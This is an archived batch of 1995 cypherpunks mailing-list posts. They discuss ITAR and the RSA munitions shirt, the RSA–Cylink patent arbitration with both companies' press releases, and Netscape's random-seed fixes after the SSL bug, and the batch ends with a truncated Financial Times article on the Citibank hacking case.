Message-ID: <Pine.ULT.3.91.950920151359.6005A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Sep 1995, Ian Goldberg wrote:

> So, Dave and I got free munitions shirts (they're different, though;
> the font is smaller and they have a bunch of X'd out Constitutional
> Amendments on the back; I think they ere designed by Joel Furr) for
> our bug find.

Good.

> 
> So I'm wearing it today.  The thing is, I live in International House,
> a residence that has 50% non-Americans.
> 
> So, any consensus as to whether it's actually illegal to do so?  I
> remember some disagreement a few weeks ago that AFAIK wasn't resolved.
> 
> As far as I can tell, it's _technically_ illegal, but any LEO would be
> out of his mind to try to enforce it (it would have to be a Fed, too,
> wouldn't it?  Or can regular city cops get you for violating export
> restrictions?).
> 
>    - Ian
> 

Funny, this thread sounds awfully familiar.  In fact, I think I wrote 
almost this _exact same post_ about 3 weeks ago, just substituting 
"Berkeley" for "Towson State University".  I mentioned the fact that I 
live in the International House of _my_ campus, and we discussed the 
legality of my wearing it.  We hashed over it for a few days, and never 
really came to a real answer, since ITAR is rather vague in that area.

I might add, however, that two days ago I wore my RSA shirt to my sound
design class, where the guy I happened to sit down next to recognized it,
was familiar with what it stood for, and knew all about the Zimmerman
case; not because he was a crypto enthusiast or a comp sci major, but
because he works for customs at Baltimore-Washington International
Airport. 

This event really changed my point of view considering ITAR... I figured 
that it was just one of those dumb laws that _nobody_ really paid much 
attention to except for the FBI and that was only because they were 
looking for a way to nail Zimmerman for writing good crypto.  I had 
assumed that ITAR was something that  customs agents/L. E. O's/etc. 
learned about, took a  test on it, then forgot about it the next day.

Interesting... they _really_ are serious, aren't they?

-=me=-

kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-)
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . .
And whenever they catch you, they will kill you.
But first, they must catch you. . ."
                                           -Richard Adams





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Wed, 20 Sep 95 07:30:31 PDT
To: paul@poboy.b17c.ingr.com (Paul Robichaux)
Subject: Re: Cylink
Message-ID: <4454.9509201427@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Paul Robichaux <paul@poboy.b17c.ingr.com> writes:
> Andrew Loewenstern writes:
> > Any ideas on how this will change the legal status of RSAREF and PGP?
> 
> Then Perry Metzger replied:
> > I'm much more interested in how this changes the legal status of the
> > D-H derived encryption systems like ElGamal, and how it alters the
> > patent status on the DSS, which is basically also derived from the
> > same root.
> 
> What I'm waiting to see is who sues RSADSI for recovery of royalties
> paid to Cylink. Imagine how Apple, Lotus, and all of the other
> bigcorps using RSA must feel right about now: they licensed a patent
> from the wrong people, and it appears that RSADSI may have known that
> their rights had expired.

It's sooo gratifying seeing the err, ever so slightly litigious folks
from RSADSI get a dose of their own medicine.

:-)

Does it apply to RSA and hence PGP by way of RSAREF, and a claimed
general patent on PK, or was this court decision on specific DH
patents only?

If so I hope the proud new owners have better marketing sense than to
stomp on their huge advertisment of RSA, PGP.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 20 Sep 95 15:51:07 PDT
To: cypherpunks@toad.com
Subject: Re: USA Today on Fear of Credit Cards over Net
In-Reply-To: <199509201518.LAA78249@tequesta.gate.net>
Message-ID: <AL9OmyczByUU075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509201518.LAA78249@tequesta.gate.net>,
liberty@gate.net (Jim Ray) wrote:

> Pity they didn't ask about, "Tossing a credit card slip/carbon
> in the garbage." Dumpster-diving is still an effective, lo-tech
> attack.

Why worry about dumpster-diving?  Even credit card receipts on carbonless
NCR paper are prey to the hungry eyes of underpaid cashiers or the 
waiter who doesn't think you wrote in a big enough tip. 

A security scheme is no stronger than its weakest link.  Even with the
attack Goldberg and Wagner discovered on Netscape SSL, the weakest link
in credit card transactions lies elsewhere.  I find it curious that
USA TODAY didn't include over-the-counter credit card transactions in
its poll.

   Alan Bostick             | 
Seeking opportunity to      | If you don't like what you read in the news,
develop multimedia content. | go out and make some of your own.
Finger abostick@netcom.com  |      Scoop Nisker
for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBMGCYtOVevBgtmhnpAQF6RgL/XrkCJe6v5v6rtUmWTgB27tSmcTTkoeGj
CXEQwDw5eHcxe0jfne/r2Y9wSkRZtb4psKIhwLDd3BxxuWhzdrhVcaTcInUV+gGo
t4i2Td883rejgqlA4xbPWcWtd5NPSC7U
=pi8V
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Wed, 20 Sep 95 15:28:22 PDT
To: perry@piermont.com
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <199509202101.RAA05534@frankenstein.piermont.com>
Message-ID: <30609562.15FB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> This is true. However, you must get 128 bits of entropy into the MD5
> -- this can be accompanied by as much junk as you like, but if there
> are at least 128 bits of entropy fed in, the MD5 process will distil
> it into what you want.

My assumption ws that if we conservatively counted at least 300 bits of entropy,
we would have 128 for sure. Not very scientific, 

> You might want to read RFC 1750,

Did that. It talks about a lot of the pitfalls. Unfortunately it does not address
(nor can it realistically be expected to address) details of what to look for
on a particular version of an OS running on some particular platform.

> and examine the code PGP uses for
> doing its random generation. Clients do lots of fairly random things
> while talking to netscape (click and keyboard press times, etc) that
> can be incorporated in, along with other sources of bits. You should
> grab bits whereever you can and keep them for when you need them, as
> getting 128 bits takes a while.

Gee, I thought I pointed out that we were putting that code in as part of
the going idle.

> PC timers inherently run at Mhz speed -- they interrupt every 100th of
> a second but you can get finer resolution by querying the clock
> chip. Does Windows let you do this?

I don't know, but I'll forward this on to our PC guys. It might be a portability
problem.

> I wouldn't do that, since it forces you to have a dependancy on
> executing a subprocess.

We try to be careful about dealing with the subprocess failing to run.

> Were I you, I'd capture the timer on every single keystroke and mouse
> click event and feed that in to your entropy generator a la PGP.

We are constantly trying to improve this area of our code. We are still taking
suggestions.

By the way, the security engineers are doing what we can to make sure that we
can expose as much of the seed generation algorithms as possible. There is a
chance we can get permission to post the code.

> >       System specific info such as hardware serial number or
> >       system id.

> By definition, that isn't random. Don't use it.

It doesn't hurt. It's also information that is not available to the external
evesdropper. Other than execution time, why should I remove it from the list
of bits being fed into the hash? Successfully getting this information probably
involves physical access to the machine.

> There are other things you can mix in, besides keystroke and mouse
> timings and positions, like system call timings for things that might
> take a bit of time.

We will check this one out also. For the really low resolution clocks, the
answer will be zero most of the time. :-)

> >     Multi-user Unix machines present a special problem. There are those
> >     at Netscape that argue that anybody who has login access to your
> >     machine may as well be considered to have root access. There are
> >     enough known attacks that this is true to a large extent.  However,
> >     I think we can do better than just giving up.
> 
> I agree. Don't run on the assumption that everyone has root --
> otherwise you'll build something that produces less safety than it could.

I agree, but I have a hard arguing with those that asser that the security
of UNIX is weak enough that given what we are doing for the patch it will
be easier to become root from a logged in account than to hack the seed.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 20 Sep 95 12:37:53 PDT
To: cypherpunks@toad.com
Subject: Re: Please send me SSL problems...
In-Reply-To: <v02110104ac85a804545b@[204.179.132.1]>
Message-ID: <9509201937.AA00765@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Jeff, the SSL specification has a severe *architectural* problem - it
>assumes that Internet Protocols are APIs - interface standards, and that
>you can just slide a "layer" underneath without anyone noticing. Such is
>not the case - all the Internet Protocols are real protocol standards, in
>that they specify the syntax, order, and semantics of the actual bits on
>the wire. The IETF quite explicitly doesn't care about APIs - that's a host
>software issue, and it doesn't matter what the host software looks like (or
>even what the machine looks like), so long as it gets the bits on the wire
>right, according to the protocol spec. This is how the Internet can make
>very strong guarantees about interoperability.

I agree with parts of this and disagree with other parts. 

The IETF does not as a whole care about APIs. The one exception being the GSS 
API which appears to be intended as a means of cicumventing ITAR. Nobody asked 
me about GSS API but a lot of people have assumed that because it comes from the 
IETF it should be the basis for the Web security protocols. I'm affraid that I 
can't see any real connection between the GSS view of the world and my own. 
Hence I find that API more of a hinderance (having to explain why not to use it) 
rather than a help.

The specific criticism of SSL, that it is layer replacement highlights a 
fundamental error made by many IETF people. The purpose of a layered protocol 
model is precisely to permit the underlying layers to be altered without 
affecting the upper layers. NNTP runs very happily on either TCP/IP or on DECnet 
for example.

Where I think SSL went wrong was in the approach taken to URLs. Rather than 
define HTTPS://foo.com/ it should specify a new transport HTTP://foo.com:80:SSL/
I think the blame for that mess should be laid at another door however. 
Basically the URI working group should have understood this issue and defined a 
syntax for handling both SSL like objects and also DECNET, ATM. This would fit 
much better with the idea of SSL as being a wrapper for an arbitrary protocol.


I think its worth pointing out that the people working at Netscape now are a 
rather different bunch to the original team.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Wed, 20 Sep 95 13:38:31 PDT
To: cypherpunks@toad.com
Subject: PKP Lawsuit Settled: Both Sides Claim Victory
Message-ID: <199509202038.PAA13656@icicle>
MIME-Version: 1.0
Content-Type: text



It looks as though the PKP suit is finally over, with both sides claiming
victory.  Is the decision public?  Can someone in California get a copy of
it and find out what really was decided.

Bruce
*****************************************************************************
    SUNNYVALE, Calif.--(BUSINESS WIRE)--Sept. 18, 1995--An  Arbitration Panel
has determined that RSA Data Security Inc.  licensed software products,
practicing public-key technology to  third parties without the legal rights
necessary to the patents  covering the technology. 

   The decision, issued on Sept. 6, 1995, came in a binding  arbitration
between RSA and CYLINK Corp., which formed the  partnership known as Public
Key Partners (PKP) on April 6, 1990. The purpose of forming PKP was to
establish a security standard and  jointly license security patents to leading
vendors in the high-tech  industry. 

   CYLINK has indicated that it will enforce the binding decision  in Federal
Court. 

   "The ruling exposes everyone of RSA's OEM customers -- from the  time PKP
was formed in 1990 until the patents expire -- to the  liability for patent
infringement," said Robert Fougner, general  counsel, CYLINK. 

   "Because of the widespread interest in public key technology,  this ruling
has enormous implications for the entire high-tech  industry, impacting the
future of all electronic information  exchanges including electronic commerce
and banking.  The panel's  decision vindicates our position that RSA Security
Inc. has been  improperly licensing technology which they did not have the 
necessary rights to." 

   The fundamental patents covering public key technology  (Merkle-Hellman and
Rivest-Shamir-Adelman) had been held by the PKP  partnership since 1990. 
Effective Sept. 6, 1995, however, the  arbitration ruled that PKP was
dissolved and the broadest of the  public key patents (invented at Stanford
University and which cover  all known implementations of public key
technology) revert from PKP  back to CYLINK. 

   The panel further ruled that RSA Data Security Inc. could not  grant its
software customers the right to make any copies of  RSA-authored software
implementing Stanford public key technology.   

   In an order issued Sept. 12, 1995, the arbitrators said that "the intent of
the order is to clarify that to the extent a (RSA  software) licensee makes
copies of the code (whether source or  object), it is not protected as a
result of the order from a claim  that the making of such copies is a `making'
under the patent laws  upon which a claim for infringement of the Stanford
patents can be  based." 

   "Cylink will assert the rights to the Stanford patents  vigorously," said
David Morris, vice president of marketing, CYLINK. "The investors of public
key cryptography, especially Martin Hellman  of Stanford University, have
never gotten a fair return for their  ground breaking invention.  Since the
formation of PKP, RSA Data  Security Inc. had been granting software rights
which allowed  licensees to copy and modify the programs, but without paying
PKP or  the inventors a royalty for those rights."  

Arbitration Ruling  

   The Stanford University patents include the Hellman-Merkle  patent, the
first public key patent making the broadest claim of  cryptography, a security
technique that ensures privacy,  authentication and the integrity of
electronic information.  Because  the Hellman-Merkle patent claims cover all
implementations of public  key techniques, including the techniques known as
RSA. 

   To avoid risk of a patent infringement suit under the Stanford  patents,
any vendor who has purchased a license from RSA since April  6, 1990, or is
contemplating the purchase of an RSA license and is  distributing software or
hardware covered by the Stanford University  patents, must now obtain a
license to the Hellman-Merkle patent from  CYLINK for their continued use. 
Customers who would like to contact  CYLINK about existing and future licenses
should call Robert  Fougner, General Counsel, at 408/735-5800.  

Background Information:    
   On April 6, 1990, RSA and CYLINK formed PKP to establish a  security
standard, and jointly license security patents to leading  vendors in the
high-tech industry.  The security technology business  is unusual in that it
is based on patents to which only these two  companies have rights. 

   The patents originally developed at Stanford University  (Diffie-Hellman,
Hellman-Merkle and Hellman-Pohling) broadly claim  the invention of public-key
cryptography.  Another patent, invented  at MIT (Rivest-Shamir-Adelman) claims
a particular implementation of  public key cryptography using the algorithm
known as "RSA." 

   In 1994, CYLINK initiated the arbitration against RSA, claiming  that RSA's
licensing practices exceeded RSA's rights under the  patents and violated the
agreements forming PKP.  CYLINK further  claimed that it was denied a promised
license to the RSA patent when  PKP was formed.  Among other rulings, the
arbitrators ruled that an  April 1990 document grants CYLINK a patent license
to the RSA  patent. 

   CYLINK Corp. is the world's largest provider of enterprise-wide  network
information security products and wireless communications.   Headquartered in
Sunnyvale, CYLINK serves Fortune 500 companies,  multinational financial
institutions and many international  government agencies.  

   --30--crd/sf* jar/sf  

CONTACT:  

Cylink Corporation, Sunnyvale 

Kim Rose, 408/774-6447
***************************************************************************
    REDWOOD CITY, Calif.--(BUSINESS WIRE)--Sept. 19, 1995--An  Arbitration
Panel recently ruled that Cylink does not have a license  to RSA patented
technology, that RSA's software licensing practices  do not breach any
agreement with Cylink or its wholly owned  subsidiary Caro-Kann and that RSA
now has the exclusive right to  license the RSA patent.   

   In a Sept. 6, 1995 ruling, an Arbitration Panel, formed by  agreement of
the parties, and after nearly a month of testimony,  ruled in favor of RSA on
every significant issue.  The Panel held  that neither Cylink nor Caro-Kann
had a license to practice RSA  patented technology.  Cylink admittedly
incorporates this technology  in its Secure X.25 product line, without any
license to do so.   

   The Panel also found that RSA's software licensing practices did  not
materially breach any of Cylink's rights.  The Panel did not rule that anyone,
(specifically including RSA and its software customers)  infringed any
existing patent rights of anyone - including Cylink.   

   As a result of the Panel's ruling, RSA now has the exclusive  right to
license the patented RSA technology.  According to Jim  Bidzos, the President
of RSA, "RSA will continue to conduct its  software business in exactly the
same way that it has for the past  ten years.   

   "In addition, RSA anticipates that licenses to the RSA Patent  will now be
much more readily available, because they now can now be  granted without
Cylink interference.  RSA has all of the intellectual property rights which it
needs to license its software.  RSA will  vigorously defend against any claim
to the contrary."   

   A recent Cylink press release on the Ruling of the Arbitration  Panel is
wildly inaccurate.  The same Robert Fougner (Cylink's  General Counsel) who is
cited in the Cylink press release has  repeatedly made express representations
to third parties that the  Stanford Patents do not cover, and are not
infringed by, the  manufacture, use or sale of products incorporating RSA's
TIPEM  software developer's toolkit.   

   As noted by Mr. Bidzos: "Cylink lost every single significant  issue in the
Arbitration.  Their press release was simply an attempt  to cover up what has
been a crushing defeat."   

   Questions regarding the Arbitration Panel Ruling or RSA licenses  should be
directed to Kurt Stammberger, RSA Technology Marketing  Manager, or Paul
Livesay, RSA Director of Legal Affairs.    

   --30--as/sf*  

CONTACT:  

RSA 

Kurt Stammberger, 415/595-8782 

kurt@rsa.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jordan@Heuristicrat.COM (Jordan M. Hayes)
Date: Wed, 20 Sep 95 15:47:32 PDT
To: cypherpunks@toad.com
Subject: Re:  RSA Prevails In Arbitration Against Cylink
Message-ID: <9509202241.AA00756@euclid.Heuristicrat.COM>
MIME-Version: 1.0
Content-Type: text/plain


	From baldwin@RSA.COM Wed Sep 20 09:09:30 1995

	Here's an article on the RSA-Cylink arbitration from the
	business wire.

[ ... elided -JMH ]

Just a note for those who aren't aware, Business Wire is a pay-per-use
"news release" service.  That is, RSA wrote the contents of what Bob
(Hi!) posted.

The clue is at the bottom of the "story":

	CONTACT: RSA
	Kurt Stammberger, 415/595-8782
	kurt@rsa.com

This is not to say anything pro or con about the content of the press
release; just that it wasn't written by a third party.

/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 20 Sep 95 12:49:09 PDT
To: cypherpunks@toad.com
Subject: Re: Munitions shirt (again)
Message-ID: <199509201945.PAA54022@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ian Goldberg wrote:

<snip>

>>So, any consensus as to whether it's actually illegal to do so?  I
>>remember some disagreement a few weeks ago that AFAIK wasn't resolved.

And Tim replied:

>The _consensus_ here seems to be: "This t-shirt is illegal to wear in front
>of non-Americans," judging by the comments here.

And since _I_ started all this trouble with a private e-mail to Futplex;
I'll now jump in saying again, [IANAL]: "This t-shirt may or may not be
illegal to wear in front of non-Americans," from my reading a while back
of the dense text of this silly law, [I'll spare all of you a quote of
it, but there's text that MIGHT be interpreted that way.]

>The _reality_ is quite different, I think, and the "this shirt is illegal"
>hype is, in my opinion, just that, hyperbole.

I agree with Tim that actual enforcement of this silly a law is unlikely,
especially in Ian's case right now, and *especially* during our US
(election) "silly season," for obvious reasons.

The availability of strong encryption is unlikely to be a major issue
during this election cycle, despite Cypherpunk efforts, and enforcement
of this dumb law would be a "gift" to those of us who think it should be.
[I hope I'm wrong here, but I think you're safe, Ian.:)]

>Even hyperbull, too.

I wouldn't go *that* far, though. Poorly written, ambiguous, statist<g>
laws can be interpreted in any number of ways and for a variety of
reasons having little (or nothing) to do with justice. <sigh>
JMR

<snip>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMGBvrW1lp8bpvW01AQFj1AP8C1RKpayv6V15sTBLiFLWV4tlfWRUuLfm
JVWgeUeHUFxBV1EttbGv30iTmwlCJmBab/wLUag9S57DLZ6Ajed7jQe0rpra56Nl
OgmM1gGU8nJJazYeqiWbYrOc/VSheSqQVLAj+vOoufW8XnU1iFkXQnRziCcyO2Nc
bto4hKBrFWY=
=qlSx
-----END PGP SIGNATURE-----
Regards, Jim Ray

 "Not everything that is faced can be changed, but nothing can be
        changed until it is faced."  --  James Baldwin
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 20 Sep 95 12:23:51 PDT
To: goedel@tezcat.com (Dietrich J. Kappe)
Subject: Re: Cypherpunks Press release
In-Reply-To: <v01510106ac85ee814baa@[206.1.161.4]>
Message-ID: <m0svVCn-0009yxC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> We've seen the word "hacker" kicked around rather arbitrarily in the press.
> Are we to conclude that the cypherpunks are a bunch of hackers? I think its
> time for some cypherpunks spin. How about a logo *and* a press release? The
> press release would give contacts (email, phone, etc.) so that someone on
> this list would be contacted by journalists when a crypto story breaks.
> 
> If we get enough volunteers, we can fax blanket every newspaper, station,
> and network in the world.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQBgAwUBMGBA2XIf3YegbdiBAQG0RQJXdWG0beFoFEk6BfEkhIDYxB6NsbSSIGWe
> Nzob7W7Gd/YyRqsVhU5T8jQEpD6sNLwTP+4SypSC9Mk8EauKAvklHkkfGr53scQh
> 5Tzp
> =Fxdn
> -----END PGP SIGNATURE-----
> 
> Dietrich Kappe | Red Planet    http://www.redweb.com
> Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
> 1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
> Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84

(<Sigh> hate to suggest this, but someone has to throw the idea out.)
We could always threaten to sue for defamation...
(You can fill in any one of a number of differences between
the canonical cypherpunk vs. hacker/cracker.)

Specify the clarification has to include logo.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 13:04:05 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: netscape bug
In-Reply-To: <199509201855.LAA17261@netcom16.netcom.com>
Message-ID: <199509202002.QAA05425@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" writes:
> none of the articles mention that the cracker must have login access
> to the computer that the random numbers are generated on. is this true?
> does the code require knowledge of the PID etc. that can only be obtained
> by a login to the system that the netscape session is running on?

You can guess the PID without much trouble -- they are 15 bit numbers.

> P.M. notes that anywhere there is a data-driven buffer overflow (which
> he suspects are all over netscape) he can get code to execute anything
> he wants. this reminds me of the
> Morris internet worm that ran exactly the same way.

That was one of the first wide exploits of the trick, yes.

> my question: I have not seen the specifics of how this works. does
> this require specialized knowledge of the native machine language on the 
> host machine?

Yes. However, its very straightforward to do.

The recent syslog(3) problem was of this nature, by the way.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 20 Sep 95 14:06:30 PDT
To: cypherpunks@toad.com
Subject: Netscape closes up 1 3/8 today!
Message-ID: <199509202104.OAA16664@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Lookit that! 416 trades and 11 times there was more
buying pressure than selling pressure..

The rumors of bug fix are outweighing the facts of the crack!

I am totally amazed! But think company insiders are probably
supporting the stock.  Holding up better than ascii armor, it is. 


NSCP is currently trading at $54 3/4 

Symbol        : NSCP        Exchange    : NASDAQ

Description   : NETSCAPE COMMUNICATIONS CORP COM             

Last Traded at: 54 3/4      Date/Time   : Sep 20  4:01   
$ Change      : 1 3/8       % Change    : 2.576113    

Bid           : 54 3/4      Ask         : 55 1/4      
Volume        : 310500      # of Trades : 416         
Opening Price : 53 1/2      Last Shares : 8           
Day Low       : 53 1/4      Day High    : 55 1/4      
52 Week Low   : 45 3/4      52 Week High: 74 3/4  
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: LFWS37A@prodigy.com (MR STEVE R KELL)
Date: Wed, 20 Sep 95 13:56:42 PDT
To: cypherpunks@toad.com
Subject: software
Message-ID: <013.01607783.LFWS37A@prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


I need new crypt software w/instruction if possible.

lfws37a@prodigy.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 13:16:18 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: cypherpunks press releases/contact list: YES!! DO IT!!
In-Reply-To: <199509201928.MAA20230@netcom16.netcom.com>
Message-ID: <199509202015.QAA05462@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" writes:
> I'm going to argue against TCM and others who are opposed to a 
> "cypherpunk press release" because this is not an "organized group".

Look, L. (may I call you L.?) --

we've gone over this many times. We aren't a group. We're a mailing
list. We've got a diversity of opinions, and we have no organization
-- nor do we want one.

> anyone who wants to issue press releases for the "cypherpunks", I say,
> GO FOR IT.

Except for the fact that it would more or less be a lie. There is no
"cypherpunks" position, so you can't release anything on the subject. 

> this is such a great idea that *I* may do it if nobody does it after
> a week or two.

I thought your last attempts at such stuff were dismal failures.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 20 Sep 95 07:25:24 PDT
To: cypherpunks@toad.com
Subject: Banks and Netscape InSec
Message-ID: <199509201425.QAA22671@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Financial Times, September 20, 1995, p. 12.


Banks' Security Chains Failed

The Citibank case has highlighted weaknesses in corporate
security measures.

By John Mason


Could it happen to us? Banks have been soul-searching about
their security systems in response to the alleged computer
hacking fraud on Citibank, in which $10m (6.49m pounds) is
said to have been removed from client accounts by a young
Russian based in St Petersburg.

In public, banks express confidence in their computer
security. "It's a shame what happened at Citibank, but it
couldn't happen here," is a typical response.

However, some industry insiders are concerned that many banks
and other commercial organisations are still leaving
themselves dangerously open to attack by hackers. Rumours of
some banks not admitting to similar breaches only increase
doubts.

The full technical picture of what allegedly happened at
Citibank is unclear. The largest US bank, unsurprisingly, is
reluctant to reveal precisely how Mr Vladimir Levin --
apparently without inside help -- allegedly breached its Wall
Street security system from his personal computer in St
Petersburg. A UK court will today decide whether to extradite
Mr Levin to the US to face trial.

It seems that Citibank was caught out by its technology, which
could not match recent developments available to hackers.

Citibank's main weakness is known to have been its use of
"fixed passwords" to guard its computerised cash management
system. This system, dubbed Citicorp Cash Manager, handles
transactions totalling $5OObn every day.

Cash management systems which provide customers with access to
their accounts so that they can make transfers, are inherently
vulnerable to hackers because by definition they allow
third-party access.

In the case of Citibank, access to the cash management system
could be made via telephone lines from anywhere in the world
using a computer. Until the incident, Citibank's system used
fixed or permanent passwords where the customer has only to
enter a name and regular password to gain entry to the system.

However, security experts now agree that this technology has
been rendered ineffective at guarding high-risk systems by the
proliferation of modem communications devices attached to
powerful PCs providing access to the Internet. Hackers now
have ready access to sophisticated software including
"sniffers" -- programs used by network managers which allow
them to look at and capture information on networks. These
give hackers access to huge quantities of information --
including directories of passwords.

The hackers can then take their pick of which password to use.
With bank cash management systems, this virtually amounts to
giving a hacker the choice of which client account to loot.

There are a number of steps banks and other security-conscious
computer network operators can take to defend themselves
against unauthorised intruders. The main option -- and that
introduced by Citibank since the Levin incident -- involves
the use of encrypted passwords that can be used only once.

A "smart card" issued to each customer contains a sequence of
passwords so that a different one is used each time. This
password is then encrypted or scrambled into a form that is,
its manufacturers claim unreadable to anyone "surfing" the
Internet. The main computer then deciphers the signal and,
able to recognise the sequence of changing passwords, lets the
genuine user into the system.

The chances of someone guessing one of Citibanks's passwords
are now one in 11m, says Mr Tom Brady of Enigma Logic of
Concord, California, which supplies this technology to
Citibank. The bank's previous fixed password technology, by
contrast, meant breaking the password system was relatively
straightforward, he says.

Concern centres on how quickly banks and others have reacted
to technological change. Although encryption technology has
been available for more than 10 years, it is only now being
generally introduced, and usually only for systems with
external access.

Barclays Bank introduced encryption for computer systems with
external access before the Citibank incident occured. Barclays
now feels "fairly comfortable" about the state of its
security, says Mr Philip Severs, deputy director of
operational risk.

However, it is clear that not every bank has closed the door
yet. Mr Severs says the business world is just "on the cusp"
of introducing encryption technology.

Another security adviser says the measures of one leading US
bank, based on both fixed and encrypted passwords, are still
considered weak by experts. Another security specialist
employed by a leading international bank says that senior
management throughout the industry has sometimes been slow to
react to change. "Sometimes people think that their security
is adequate simply because it has not been breached in the
past. At other times, head offices are warned of the dangers,
but fail to act because of cost factors."

Whatever the state of bank security, their experts agree that
their customers' awareness of the problem is lower. "Whenever
payments are made or orders placed electronically, then a
threat exists. The banks are leading on this. Companies are
some way behind," says Mr Severs.

But encryption remains only one way of improving security. The
alleged hacking incident at Citibank involved more than simply
breaching the bank's password system.

The US government claims Mr Levin was able to watch corporate
clients making numerous transactions before deciding which
account to take money from. He also allegedly spotted one
security precaution in place and limited each of his
withdrawals to under 200,000 pounds ($310,540).

Citibank will not comment on its security measures other than
to point to its "smart cards". Huwever, the bank agrees that
there was only partiai use of another well-established.
security system -- "predefined" transfer routes. These allow
customers to make transfers only to specific bank accounts
making it impossible for a hacker to remove funds for himself.

Citibank offers such an option. However, it is only useful to
some customers. The average corporate customer might find it
suitable because the number of destination accounts they need
is limited. However, for financial institutions making
transfers to many accounts, such a system is too cumbersome.
Perhaps significantly, one of Mr Levin's alleged nctims was an
investment company.

Citibank investigators say Mr Levin gave himself away by
making a number of "amateurish" mistakes, but admit he was a
very sophisticated computer operator, allegedly attempting a
particularly elegant fraud.

The bank concedes that it still does not fully understand all
the technical aspects of how Mr Levin allegedly managed to
break in. If and when he is extradited to the US and
introduced to that country's plea bargaining system, he will
be invited to explain further.

Banking security experts agree that the Citibank episode shows
that effective detection systems to track unusual transactions
remain essential. In the Citibank case these worked well,
enabling the attempted fraud to be nipped in the bud,
monitored and losses kept to $400,000.
But they agree that even if new technology is introduced,
